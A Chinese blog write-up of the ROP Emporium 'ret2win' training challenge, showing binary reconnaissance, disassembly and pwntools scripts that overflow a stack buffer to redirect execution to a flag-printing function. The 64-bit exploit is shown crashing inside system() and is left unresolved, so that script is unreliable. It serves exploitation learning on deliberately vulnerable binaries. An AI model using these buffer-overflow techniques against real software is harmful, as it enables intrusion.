ROP_Emporium_ret2win

最新推荐文章于 2022-04-21 16:45:26 发布
最新推荐文章于 2022-04-21 16:45:26 发布
阅读量614 收藏
点赞数
分类专栏: bin # pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ga4ra/article/details/123696489
版权
bin 同时被 2 个专栏收录
41 篇文章 1 订阅
订阅专栏
pwn
12 篇文章 0 订阅
订阅专栏

文章目录


题目下载地址: ROP Emporium

1. ret2win32

信息收集

$ file ret2win32
ret2win32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1596c11f85b3ed0881193fe40783e1da685b851, not stripped
$ checksec ret2win32
[*] '/home/starr/Documents/CProject/pwn/ret2win32'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE

32位程序,开启了NX防护。

开启崩溃转储,用cyclic试一下溢出:

$ ulimit -c unlimited
$ sudo bash -c 'echo %e.core.%p > /proc/sys/kernel/core_pattern'
$ cyclic 200 > cyclic.txt
$ ./ret2win32 < cyclic.txt
ret2win by ROP Emporium
x86

For my first trick, I will attempt to fit 56 bytes of user input into 32 bytes of stack buffer!
What could possibly go wrong?
You there, may I have your input please? And don't worry about null bytes, we're using read()!

> Thank you!
Segmentation fault (core dumped)
$ gdb ./ret2win32 ./ret2win32.core.12145
Core was generated by `./ret2win32'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x6161616c in ?? ()
$ cyclic -l 0x6161616c
44

缓冲区偏移44字节处为返回地址。

反汇编

$ objdump -M intel -d ./ret2win32
08048546 <main>:
...
	804858b:       e8 1d 00 00 00          call   80485ad <pwnme>
...
080485ad <pwnme>:
	80485ad:       55                      push   %ebp

...
0804862c <ret2win>:
	804862c:       55                      push   %ebp

...

main主要就是调用pwnme。

用ida看看pwnme的具体逻辑和内存地址:

.text:080485AD                 push    ebp
.text:080485AE                 mov     ebp, esp
.text:080485B0                 sub     esp, 28h
.text:080485B3                 sub     esp, 4
.text:080485B6                 push    20h ; ' '       ; n
.text:080485B8                 push    0               ; c
.text:080485BA                 lea     eax, [ebp+s]
.text:080485BD                 push    eax             ; s
.text:080485BE                 call    _memset
.text:080485C3                 add     esp, 10h
.text:080485C6                 sub     esp, 0Ch
.text:080485C9                 push    offset aForMyFirstTric ; "For my first trick, I will attempt to f"...
.text:080485CE                 call    _puts
.text:080485D3                 add     esp, 10h
.text:080485D6                 sub     esp, 0Ch
.text:080485D9                 push    offset aWhatCouldPossi ; "What could possibly go wrong?"
.text:080485DE                 call    _puts
.text:080485E3                 add     esp, 10h
.text:080485E6                 sub     esp, 0Ch
.text:080485E9                 push    offset aYouThereMayIHa ; "You there, may I have your input please"...
.text:080485EE                 call    _puts
.text:080485F3                 add     esp, 10h
.text:080485F6                 sub     esp, 0Ch
.text:080485F9                 push    offset format   ; "> "
.text:080485FE                 call    _printf
.text:08048603                 add     esp, 10h
.text:08048606                 sub     esp, 4
.text:08048609                 push    38h ; '8'       ; nbytes
.text:0804860B                 lea     eax, [ebp+s]
.text:0804860E                 push    eax             ; buf
.text:0804860F                 push    0               ; fd
.text:08048611                 call    _read           ; read(stdin, buf, 56)
.text:08048616                 add     esp, 10h
.text:08048619                 sub     esp, 0Ch
.text:0804861C                 push    offset aThankYou ; "Thank you!"
.text:08048621                 call    _puts
.text:08048626                 add     esp, 10h
.text:08048629                 nop
.text:0804862A                 leave
.text:0804862B                 retn

buf位于ebp-0x28(40字节)的位置,但read却可以输入56(0x38)个字节,所以刚刚的cyclic在偏移44字节处(ebp+4)覆盖返回地址。

再看下ret2win函数,它直接输出flag:

.text:0804862C ret2win         proc near
.text:0804862C ; __unwind {
.text:0804862C                 push    ebp
.text:0804862D                 mov     ebp, esp
.text:0804862F                 sub     esp, 8
.text:08048632                 sub     esp, 0Ch
.text:08048635                 push    offset aWellDoneHereSY ; "Well done! Here's your flag:"
.text:0804863A                 call    _puts
.text:0804863F                 add     esp, 10h
.text:08048642                 sub     esp, 0Ch
.text:08048645                 push    offset command  ; "/bin/cat flag.txt"
.text:0804864A                 call    _system
.text:0804864F                 add     esp, 10h
.text:08048652                 nop
.text:08048653                 leave
.text:08048654                 retn
.text:08048654 ; } // starts at 804862C
.text:08048654 ret2win         endp

因为checksec部分并没有开启pie,所以将返回地址覆盖为0x0804862C即可。

Exp

from pwn import *

context.arch = "i386"
context.bits = 32
context.os = "linux"

def getio(program):
    io = process(program)
    # io = gdb.debug([program], "b main")
    return io;

io = getio("./ret2win32")

pRet2Win = 0x804862c;
payload = bytes("A"*44, encoding="ascii")
payload += p32(pRet2Win)



io.recvuntil(">")

io.sendline(payload)
print(io.recv())
io.interactive()

顺利拿到flag。

2. ret2win

逻辑和ret2win32一样,但改成了64位:

$ file ret2win
ret2win: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=19abc0b3bb228157af55b8e16af7316d54ab0597, not stripped
$ checksec ret2win
[*] '/home/starr/Documents/CProject/pwn/ret2win'
    Arch:     amd64-64-little
	...

还是用刚刚的cyclic.txt, 崩溃信息如下:

Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x0000000000400755 in pwnme ()

这里的崩溃信息显示程序停在了0x400755,这其实是pwnme的ret指令所在地址,因为 64 位可以使用的内存地址不能大于 0x00007fffffffffff,所以不能反馈出溢出点。

调试一下:

────────────────────────────────────── stack ────
0x007fffffffe2b8│+0x0000: 0x6161616c6161616b     ← $rsp
...
───────────────────────────────────── code:x86:64 ────
     0x40074e <pwnme+102>      call   0x400550 <puts@plt>
     0x400753 <pwnme+107>      nop
     0x400754 <pwnme+108>      leave
 →   0x400755 <pwnme+109>      ret

返回地址是0x6161616c6161616b,经cyclic确认, 溢出点偏移是40:

$ cyclic -l 0x6161616c6161616b
[CRITICAL] Subpattern must be 4 bytes
$ cyclic -l 0x6161616b
40

反汇编

objdump -d ret2win确认下ret2win的地址:

0000000000400756 <ret2win>:
  400756:       55                      push   %rbp

顺便用ida看下pwnme吧:

.text:00000000004006E8 pwnme           proc near               ; CODE XREF: main+3B↑p
.text:00000000004006E8
.text:00000000004006E8 buf             = byte ptr -20h
.text:00000000004006E8
.text:00000000004006E8 ; __unwind {
.text:00000000004006E8                 push    rbp
.text:00000000004006E9                 mov     rbp, rsp
.text:00000000004006EC                 sub     rsp, 20h
.text:00000000004006F0                 lea     rax, [rbp+buf]
.text:00000000004006F4                 mov     edx, 20h ; ' '  ; n
.text:00000000004006F9                 mov     esi, 0          ; c
.text:00000000004006FE                 mov     rdi, rax        ; s
.text:0000000000400701                 call    _memset
.text:0000000000400706                 mov     edi, offset aForMyFirstTric ; "For my first trick, I will attempt to f"...
.text:000000000040070B                 call    _puts
.text:0000000000400710                 mov     edi, offset aWhatCouldPossi ; "What could possibly go wrong?"
.text:0000000000400715                 call    _puts
.text:000000000040071A                 mov     edi, offset aYouThereMayIHa ; "You there, may I have your input please"...
.text:000000000040071F                 call    _puts
.text:0000000000400724                 mov     edi, offset format ; "> "
.text:0000000000400729                 mov     eax, 0
.text:000000000040072E                 call    _printf
.text:0000000000400733                 lea     rax, [rbp+buf]
.text:0000000000400737                 mov     edx, 38h ; '8'  ; nbytes
.text:000000000040073C                 mov     rsi, rax        ; buf
.text:000000000040073F                 mov     edi, 0          ; fd
.text:0000000000400744                 call    _read           ; read(stdin, buf, 0x38)
.text:0000000000400749                 mov     edi, offset aThankYou ; "Thank you!"
.text:000000000040074E                 call    _puts
.text:0000000000400753                 nop
.text:0000000000400754                 leave
.text:0000000000400755                 retn
.text:0000000000400755 ; } // starts at 4006E8
.text:0000000000400755 pwnme           endp

要记住64位linux的调用约定是rdi, rsi, rdx, rcx, r8, r9。

Exp

from pwn import *

context.arch = "i386"
context.bits = 64
context.os = "linux"

def getio(program):
    io = process(program)
    # io = gdb.debug([program], "b main")
    return io;

io = getio("./ret2win")

pRet2Win = 0x0000000000400756;
payload = bytes("A"*40, encoding="ascii")
payload += p64(pRet2Win)
# with open("payload.txt", "wb") as f:
#     f.write(payload)

io.recvuntil(">")

# gdb.attach(io)
# pause()
io.sendline(payload)
print(io.recv())
print(io.recvline())
io.interactive()

不过,崩溃了,,

#0  0x00007ffff7a312d6 in do_system (line=0x400943 "/bin/cat flag.txt") at ../sysdeps/posix/system.c:125
125     ../sysdeps/posix/system.c: No such file or directory.

显示文件不存在,但本地是有的:

$ cat flag.txt
ROPE{a_placeholder_32byte_flag!}

手动把rodata里的字符串改成./flag.txt,还是崩溃。。。

#0  0x00007ffff7a312d6 in do_system (line=0x400943 "/bin/cat ./flag.txt") at ../sysdeps/posix/system.c:125
125     ../sysdeps/posix/system.c: No such file or directory.
CodeStarr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
小白详解rop emporium
BadRer的博客
08-02 2087
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
【rop emporium 2020】ret2win
^_^
02-06 405
这篇博客主要是关于rop emporium(2020年7月的版本)的ret2win这道题的学习记录 因为网上都是比较早版本的题解,所以写了这篇博客,不过这道题倒是变化不大。 题目链接:https://ropemporium.com/challenge/ret2win.html 32位 反编译后: int __cdecl main(int argc, const char **argv, const char **envp) { setvbuf(_bss_start, 0, 2, 0); puts.
ret2win Challenge1(x86-64)
u014377094的博客
02-10 318
ret2win 1 x64
ret函数相当于c语言中,ret2syscall
weixin_39793638的博客
05-22 1561
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?ROP 原理:主函数通过__cdcall方式进行函数压栈:PUSH PART2PUSH PART1主函数通过call指令完成指令转移:call(PUSH EIPJUMP NEXT)子函数开辟堆栈空间:PUSH ESPMOV EBP, ESPSUB ESP, 80H子函数清空栈空间并返回上级函数栈空间:LEAVE(MOV ...
BUUCTF pwn wp 86 - 90
fa1c4的blog
01-17 612
mrctf2020_shellcode_revenge 一道经典题目, 可见字符shellcode. F5失败直接读汇编 ; Attributes: bp-based frame ; int __cdecl main(int argc, const char **argv, const char **envp) public main main proc near buf= byte ptr -410h var_8= dword ptr -8 var_4= dword ptr -4 ; __unwi
适合初学者的ROP攻击入门教程 - [Pwn] ROP Emporium Guide
HiTaQini
06-08 2964
ROP Emporium 是一个ROP攻击入门教学网站,提供了一系列的挑战任务,这些挑战对逆向工程或debug的要求不高,因此对初学者十分友好,适合初学者了解ROP攻击。网站中共有8个挑战任务,每个挑战都引入了一个新概念/知识点,其复杂性和难度逐渐增加,循序渐进,而且每个挑战都有32/64位两个版本的程序,适合初学者了解二者之间的差异。
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
基于ROP的SAMPLE开发代码,属于通信框架的一部分。ROP是淘宝提供的一种开发协议框架,底层基于NETTY。
Rompmporium漏洞:ROP Emporium漏洞
02-15
ROP Emporium开发 该存储库包含针对ROP Emporium挑战的漏洞利用程序。
arm64_rop_exploit:Arm64返回定向编程(ROP)漏洞
03-02
在运行Ubuntu 18.04.4 LTS(GNU / Linux 4.15.0-1062-raspi2 aarch64)的Raspberry Pi上测试了arm64代码。执照有关详细信息,请参阅文件。rop.py关于该项目将研究漏洞的利用以及面向收益的编程的使用。 这将建立在...
rop_matlab1.rar_数据结构_matlab_
08-11
利用宽度有限方法(BFS)寻找最短路径和最小树的算法和算例。
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
STM8S103
ROP Emporium x86_64 7~8题
CoLin的pwn小屋
04-21 355
ROP Emporium x64 7-8题
软件安全实验——lab7(缓冲区溢出3:返回导向编程技术ROP)
Onlyone_1314的博客
08-05 2552
目录标题1、举例详细解释什么是Return-orientd Programming ROP?(至少两个例子:x86 和arm)(1)ROP在X86指令集上的实例(2)ROP在ARM上的可行性2、举例描述一个远程缓冲区溢出,思考和本地溢出的区别,攻击难点在哪里?3、描述arm和x64下的缓冲区溢出,比较和x86的差异。 1、举例详细解释什么是Return-orientd Programming ROP?(至少两个例子:x86 和arm) ROP(Return-oriented programming),即“返
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1275
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
Linux执行可执行文件提示No such file or directory的解决方法
热门推荐
SUN
06-22 23万+
Linux操作系统执行可执行文件提示No such file or directory的原因可能是操作系统位数和可执行文件需要的lib库的位数不匹配,此时可以安装对应位数的lib库解决该问题。
ROPEmporium通关全解(五)
Yale的博客
12-24 339
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战题目的背景 来自ROPEmporium...
【CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1262
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
Python出现: TypeError: expected string or buffer
小青蛙
10-19 6万+
python 提示 TypeError: expected string or buffer,一般为数据类型与预定的数据类型不一致造成的
Python2/3之kafka模块 Value must be bytes报错处理
Quincy.Coder的博客
09-23 1349
解决方案: 在要发到kafka的数据后添加encode(“utf-8”),亲测有效! producer.send(‘my-topic’, json.dumps(msg).encode(‘utf-8’)) 参考链接: https://stackoverflow.com/questions/41146144/how-to-fix-assertionerror-value-must-be-bytes-error-in-python2-7-with-apache/41146274 ...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值